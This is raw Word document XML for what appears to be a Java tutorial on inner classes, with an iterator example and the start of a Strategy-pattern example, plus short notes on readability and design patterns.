          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A58584A"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946556"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FFFE1"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w: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54480AEB"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> index </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD7AB57"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946556"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED51DDE"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasNext</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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00E7B1D5"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> index </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DE64F"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946556"/>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6B994BCD"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946556"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FDDA60"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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0FAF8C17"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E0188"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946556"/>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34AD9A92"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946556"/>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030F968E"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946556"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F6BF4"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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52AD231E"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57291E90"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946556"/>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415F766F" w14:textId="01B5C9CA"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946556"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC4FBD" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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Improving Readability and Maintainability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454BBF5B" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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ing inner classes helps improve the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>readability</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maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the code by logically grouping related classes together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F8DAA8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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also reduces clutter by not exposing the inner class to the external world if it is not needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E91548" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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Implementing Adapter and Strategy Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2321D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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ner classes are useful for implementing certain </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>design patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Adapter</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Strategy patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where a behavior or strategy can be defined within a class that is used only by the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA95CE6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="0023650C" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example (Strategy Pattern):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFC718"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648940"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Context</w:t>
      </w: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26B5C5A7"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648940"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266C5AA8"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648940"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEA158"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648940"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> setStrategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Strategy</w:t>
